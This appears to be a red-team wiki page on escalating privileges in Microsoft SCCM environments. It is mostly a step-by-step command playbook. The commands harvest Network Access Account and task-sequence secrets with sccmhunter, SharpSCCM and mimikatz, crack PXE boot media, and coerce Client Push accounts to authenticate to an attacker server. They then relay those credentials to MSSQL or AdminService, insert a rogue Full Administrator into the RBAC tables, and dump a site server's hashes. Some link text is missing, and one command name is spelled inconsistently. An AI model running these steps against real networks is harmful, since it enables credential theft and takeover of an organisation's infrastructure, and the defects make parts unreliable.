Privilege Escalation

Theory

Currently there are three different pathways for privilege escalation routes in an SCCM environment and take control over the infrastructure:

Credential harvesting: includes all the ways that could permit to retrieve SCCM related credentials in the environment.
Authentication Coercion: with a compromised machine in an Active Directory where SCCM is deployed via Client Push Accounts on the assets, it is possible to have the "Client Push Account" authenticate to a remote resource and, for instance, retrieve an NTLM response (i.e. ). The "Client Push Account" usually has local administrator rights to a lot of assets.
SCCM site takeover: a NTLM authentication obtained from the SCCM primary site server can be relayed to the SMS Provider or the MSSQL server in order to compromise the SCCM infrastructure.
SCCM site takeover from a passive site server: as describer by in this , when a passive site server is setup for high availability purpose, its machine account must be a member of the local Administrators group on the active site server. It must also be administrator on all the site system deployed in the site, including the MSSQL database

Credential harvesting

The following SCCM components can be found on SCCM clients and may contain credentials

Device Collection variables
TaskSequence variables
Network Access Accounts (NAAs)
Client Push Accounts
Application & Scripts (potentially)

Find more details about these components in post.

Network Access Accounts (NAAs)

NAAs are manually created domain accounts used to retrieve data from the SCCM Distribution Point (DP) if the machine cannot use its machine account. Typically, when a machine has not yet been registered in the domain. To do this, the SCCM server sends the NAA policy to the machine, which will store the credentials encrypted by DPAPI on the disk. The credentials can be retrieved by requesting the WMI class in the CIM store in a binary file on the disk.

NAA doesn't need to be privileged on the domain, but it can happen that administrators give too many privileges to these accounts.

It is worth to note that, even after deleting or changing the NAA in the SCCM configuration, the binary file still contains the encrypted credentials on the enrolled computers.

SystemDPAPIdump

SystemDPAPIdump.py -creds -sccm $DOMAIN/$USER:$PASSWORD@target.$DOMAIN

Manualy

On the other hand, it is possible, from a controlled computer account, to manually request the SCCM policy and retrieve the NAAs inside.

Step 1: Gain control over a computer account password.

For this step, it is possible to create a new computer account (if permited by the domain policy), instead of compromise a domain computer.

addcomputer.py -dc-ip $DC -computer-name controlledComputer$ -computer-pass controlledPassword $DOMAIN/$USER:$PASSWORD

Step 2: Use sccmwtf.py to extract NAA secrets

A controlled computer account is needed to send the authenticated request (this is why a computer account has been created previously) to retrieve the policy, but the account to spoof doesn't need to be the same.

Here, $SCCM_MP_NetBiosName takes the value of the SCCM Management Point server NETBIOS name.

sccmwtf.py fakepc fakepc.$DOMAIN $SCCM_MP_NetBiosName "$DOMAIN\controlledComputer$" "controlledPassword"

Step 3: Obtain obfuscated NAA secrets

The obufscated NAA secrets will be saved in a local file.

cat /tmp/naapolicy.xml

Values to decode are the long hexadecimal strings in the CDATA sections (<![CDATA[String_here]).

Step 4: Decode obfuscated strings

policysecretdecrypt.exe $HEX_STRING

SCCMHunter

HTTP

#Create a new computer account and request the policies
python3 sccmhunter.py http -u $USER -p $PASSWORD -d $DOMAIN -dc-ip $DC_IP -auto

#To use an already controlled computer account
python3 sccmhunter.py http -u $USER -p $PASSWORD -d $DOMAIN -cn $COMPUTER_NAME -cp $COMPUTER_PASSWORD -dc-ip $DC_IP

DPAPI

# Extracting from WMI repository root\ccm\policy\Machine\ActualConfig namespace:
python3 sccmhunter.py dpapi -u $USER -p $PASSWORD -d $DOMAIN -dc-ip $DC_IP -target $TARGET_IP -wmi

# Extracting from WMI repository OBJECTS.DATA file:
python3 sccmhunter.py dpapi -u $USER -p $PASSWORD -d $DOMAIN -dc-ip $DC_IP -target $TARGET_IP -disk

# Locally From WMI
Get-WmiObject -Namespace ROOT\ccm\policy\Machine\ActualConfig -Class CCM_NetworkAccessAccount

# Extracting from CIM store
SharpSCCM.exe local secretes disk

# Extracting from WMI
SharpSCCM.exe local secretes wmi

# Using SharpDPAPI
SharpDPAPI.exe SCCM

# Using mimikatz
mimikatz.exe
mimikatz # privilege::debug
mimikatz # token::elevate
mimikatz # dpapi::sccm

SharpSCCM also permits to request the SCCM policy remotely to retrieve the NAA credentials inside.

SharpSCCM.exe get secretes

TaskSequence variables

TaskSequence are steps that can be configured by an administrator to perform specific actions, for example "Sequence for adding a machine to the domain". Think of it as a script that runs. These TaskSequences can contain variables that can contain credentials. These sequences can use device collection variables (presented in the next section) as conditions.

# Extracting from WMI repository root\ccm\policy\Machine\ActualConfig namespace:
python3 sccmhunter.py dpapi -u $USER -p $PASSWORD -d $DOMAIN -dc-ip $DC_IP -target $TARGET_IP -wmi

# Extracting from WMI repository OBJECTS.DATA file:
python3 sccmhunter.py dpapi -u $USER -p $PASSWORD -d $DOMAIN -dc-ip $DC_IP -target $TARGET_IP -disk

# Locally from WMI 
Get-WmiObject -Namespace ROOT\ccm\policy\Machine\ActualConfig -Class CCM_TaskSequence

# Extracting from CIM store
SharpSCCM.exe local secrets -m disk

# Extracting from WMI
SharpSCCM.exe local secrets -m wmi

SharpSCCM also permits to request the SCCM policy remotely to retrieve the NAA credentials inside.

SharpSCCM.exe get secrets

Device Collection variables

Devices enrolled in an SCCM environment can be grouped by collection. These exist by default, but administrators can create custom collections (for example "Server 2012 devices"), and add variables for these collections that will be used, for example, during application deployement to check some conditions. These variables may very well contain credentials and be found locally on the clients.

# Extracting from WMI repository root\ccm\policy\Machine\ActualConfig namespace:
python3 sccmhunter.py dpapi -u $USER -p $PASSWORD -d $DOMAIN -dc-ip $DC_IP -target $TARGET_IP -wmi

# Extracting from WMI repository OBJECTS.DATA file:
python3 sccmhunter.py dpapi -u $USER -p $PASSWORD -d $DOMAIN -dc-ip $DC_IP -target $TARGET_IP -disk

# Locally from WMI 
Get-WmiObject -Namespace ROOT\ccm\policy\Machine\ActualConfig -Class CCM_CollectionVariable

# Locally from CIM store
SharpSCCM.exe local secrets -m disk

# Locally from WMI
SharpSCCM.exe local secrets -m wmi

PXE/OSD (Operating System Deployment)

Credential harvesting

The Pre-Boot Execution Environment (PXE) is a mechanism for booting a computer over the network. Specifically, instead of booting from a CD drive, USB key or hard disk and finding the boot program, the PC will use the network to read such a program from the PXE server.

Several secrets could be retreived from Operating System Deployment (OSD)

Collection variables
Account to write image to SMB share
Account to pull files from SMB share
Set local admin password
Run arbitrary command
Account to join the domain (Apply Network Settings)

No Password

sudo python3 pxethiefy.py explore -i eth0

Password Protected

sudo python3 pxethiefy.py explore -i eth0

# Seting up Hashcat 
cd /workspace
git clone https://github.com/hashcat/hashcat.git
git clone https://github.com/MWR-CyberSec/configmgr-cryptderivekey-hashcat-module
cp configmgr-cryptderivekey-hashcat-module/module_code/module_19850.c hashcat/src/modules/
cp configmgr-cryptderivekey-hashcat-module/opencl_code/m19850* hashcat/OpenCL/
cd hashcat
git checkout -b v6.2.5 tags/v6.2.5
make

# Crack the hash
hashcat/hashcat -m 19850 --force -a 0 /workspace/pxe_hash /usr/share/wordlists/rockyou.txt

Decrypt the file using the found password

pxethiefy.py decrypt -p "password" -f ./2023.05.05.10.43.44.0001.{85CA0850-35DC-4A1F-A0B8-8A546B317DD1}.boot.var

No Password

python.exe pxethief.py 2 $SCCM_IP

Password Protected

python.exe pxethief.py 2 $SCCM_IP

Download the encrypted files specified by PXEThief, and print the hash

# Retreive files
tftp -i 192.168.33.11 GET "\SMSTemp\2024.03.28.03.27.34.0001.{BC3AEB9D-2A6C-46FB-A13E-A5EEF11ABACD}.boot.var" "2024.03.28.03.27.34.0001.{BC3AEB9D-2A6C-46FB-A13E-A5EEF11ABACD}.boot.var"

# Get the hash
python.exe pxethief.py 5 '.\2024.03.28.03.27.34.0001.{BC3AEB9D-2A6C-46FB-A13E-A5EEF11ABACD}.boot.var'

Decrypt the file using the found password

py.exe pxethief.py 3 ".\2024.03.28.03.27.34.0001.{BC3AEB9D-2A6C-46FB-A13E-A5EEF11ABACD}.boot.var" password

Missconfiguration

If "Enable command support" is enabled, we can spawn a shell during OS deployment by pressing F8.

Authentication Coercion via Client Push Installation

In some case, the "Client Push Accounts" could even be part of the Domain Admins group, leading to a complete takeover of the domain.

The client push installation can be triggered forcefully or - if you're lucky - your compromised machine might not have the SCCM client installed, which mean you could capture the client push installation as it occurs.

Option 1: Forcefully "coerce" the Client Push Installation

Step 1: Prepare coercion receiver

Note that you could either capture & crack received credentials or relay them to a suitable target system (or both).

# On Linux
## Relay using ntlmrelayx.py
ntlmrelayx.py -smb2support -socks -ts -ip 10.250.2.100 -t 10.250.2.179

# On Windows
## Credential capture using Inveigh 
Inveigh.exe

Step 2: Trigger Client-Push Installation

# If admin access over Management Point (MP)
SharpSCCM.exe invoke client-push -t <AttackerServer> --as-admin

# If not MP admin
SharpSCCM.exe invoke client-push -t <AttackerServer>

Step 3: Cleanup

If you run the above SharpSCCM command with the --as-admin parameter (cause you have admin privileges over the MP), there's nothing to do. Otherwise get in contact with the administrator of the SCCM system you just messed up and provide the name or IP of the attacker server you provided in the -t <AttackerServer> parameter. This is the device name that will appear in SCCM.

Option 2: Wait for Client Push Installation

# Credential capture using Inveigh 
Inveigh.exe

SCCM Site Takeover

The user account that installs the site must have the following permissions:
Administrator on the following servers:
The site server
Each SQL Server that hosts the site database
Each instance of the SMS Provider for the site
Sysadmin on the instance of SQL Server that hosts the site database

This means that it is possible to obtain administrative access on the site database server, or interact as a local administrator with the HTTP API on the SMS Provider, by relaying a NTLM authentication coming from the primary site server, for example by coercing an automatic client push installation from it, and granting full access on the SCCM site to a controlled user.

Relay to the MSSQL site database

Some requirements are needed to perform the attack:

fallback to NTLM authentication is enabled (default)
PKI certificates are not required for client authentication (default)
either:
- MSSQL is reachable on the site database server
OR
- SMB is reachable and SMB signing isn’t required on the site database server
knowing the three-character site code for the SCCM site is required (step 3 below)
knowing the NetBIOS name, FQDN, or IP address of a site management point is required
knowing the NetBIOS name, FQDN, or IP address of the site database server is required

Retrieve the controlled user SID

The first step consists in retrieving the hexadecimal format of the user's SID (Security IDentifier) to grant "Full Administrator SCCM role" to, on the site database server. The hex formatted SID is needed in a part below: https://github.com/v4resk/red-book/blob/main/ad/movement/sccm-mecm/sccm-mecm.md#4.-obtain-an-sql-console.

rpcclient -c "lookupnames USER" $TARGET_IP

lookupsid.py "$DOMAIN"/"$USERNAME":"$PASSWORD"@"$TARGET_IP_OR_NAME"

from impacket.ldap import ldaptypes
sid=ldaptypes.LDAP_SID()
sid.fromCanonical('sid_value')
print('0x' + ''.join('{:02X}'.format(b) for b in sid.getData()))

# this should be run on the windows SCCM client as the user (no need for admin privileges here)
SharpSCCM.exe get user-sid

Setup NTLM relay server

# targetting MS-SQL
ntlmrelayx.py -t "mssql://siteDatabase.domain.local" -smb2support -socks

# targeting SMB
ntlmrelayx.py -t "siteDatabase.domain.local" -smb2support -socks

Authentication coercion

There isn't any UNIX-like alternative to the SharpSCCM.exe invoke client-push feature (yet).

SharpSCCM.exe invoke client-push -mp "SCCM-Server" -sc "<site_code>" -t "attacker.domain.local"

The rest of this page is focusing on relaying the authentication on the MS-SQL service.

Obtain an SQL console

proxychains mssqlclient.py "DOMAIN/SCCM-Server$"@"siteDatabase.domain.local" -windows-auth

Once the console is obtained, the attack can proceed to granting the user full privileges by running the following commands in the SQL console.

--Switch to site database
use CM_<site_code>

--Add the SID, the name of the current user, and the site code to the RBAC_Admins table
INSERT INTO RBAC_Admins (AdminSID,LogonName,IsGroup,IsDeleted,CreatedBy,CreatedDate,ModifiedBy,ModifiedDate,SourceSite) VALUES (<SID_in_hex_format>,'DOMAIN\user',0,0,'','','','','<site_code>');

--Retrieve the AdminID of the added user
SELECT AdminID,LogonName FROM RBAC_Admins;

--Add records to the RBAC_ExtendedPermissions table granting the AdminID the Full Administrator (SMS0001R) RoleID for the “All Objects” scope (SMS00ALL), 
--the “All Systems” scope (SMS00001), 
--and the “All Users and User Groups” scope (SMS00004)
INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES (<AdminID>,'SMS0001R','SMS00ALL','29');
INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES (<AdminID>,'SMS0001R','SMS00001','1');
INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES (<AdminID>,'SMS0001R','SMS00004','1');

It is then possible to verify the new privileges on SCCM.

# this should be run on the windows SCCM client as the user that was just given full administrative role to 
.\SharpSCCM.exe get site-push-settings -mp "SCCM-Server" -sc "<site_code>"

Post exploitation via SCCM can now be performed on the network.

Relay to the HTTP API AdminService

Some requirements are needed to perform the attack:

The HTTP API for the AdminService service is reachable on the SMS Provider server
knowing the NetBIOS name, FQDN, or IP address of a site management point is required
knowing the NetBIOS name, FQDN, or IP address of the site SMS provider server is required

Setup an NTLM relay server

ntlmrelayx.py -t https://smsprovider.domain.local/AdminService/wmi/SMS_Admin -smb2support --adminservice --logonname "DOMAIN\USER" --displayname "DOMAIN\USER" --objectsid <USER_SID>

Authentication coercion

There isn't any UNIX-like alternative to the SharpSCCM.exe invoke client-push feature (yet).

SharpSCCM.exe invoke client-push -mp "SCCM-Server" -sc "<site_code>" -t "attacker.domain.local"

If the NTLM relay attack is a success and ntlmrelayx.py has effectively sent the request to the sms provider server, the controlled should be now a SCCM site admin.

It is then possible to verify the new privileges on SCCM.

# this should be run on the windows SCCM client as the user that was just given full administrative role to 
SharpSCCM.exe get site-push-settings -mp "SCCM-Server" -sc "<site_code>"

Relay from a passive site server to the active site server

Some requirements are needed to perform the attack:

a passive site server is present on the network and its reachable
knowing the NetBIOS name, FQDN, or IP address of the passive and active site servers is required
SMB signing is not required on the active site server (default)

Setup an NTLM relay server

ntlmrelayx.py -t $ACTIVE_SERVER.$DOMAIN -smb2support -socks

Authentication coercion

If the NTLM relay attack is a success and ntlmrelayx.py has effectively sent the request to the active server, a SMB session through socks proxy has been opened with administrative rights.

Dump active site server account credentials

proxychains4 secretsdump.py $DOMAIN/$PASSIVE_SERVER\$@$ACTIVE_SERVER.$DOMAIN

Retrieve the LM:NT hash of the server account.

Add a new SCCM Full Admin

sccmhunter.py admin -u $ACTIVE_SERVER\$ -p $LMHASH:NTHASH -ip $SMS_PROVIDER_IP

() (C:\) >> add_admin controlledUser <controlledUser_SID>
() (C:\) >> show_admins

Post exploitation via SCCM can now be performed on the network.

Resources

Last updated 1 year ago

Was this helpful?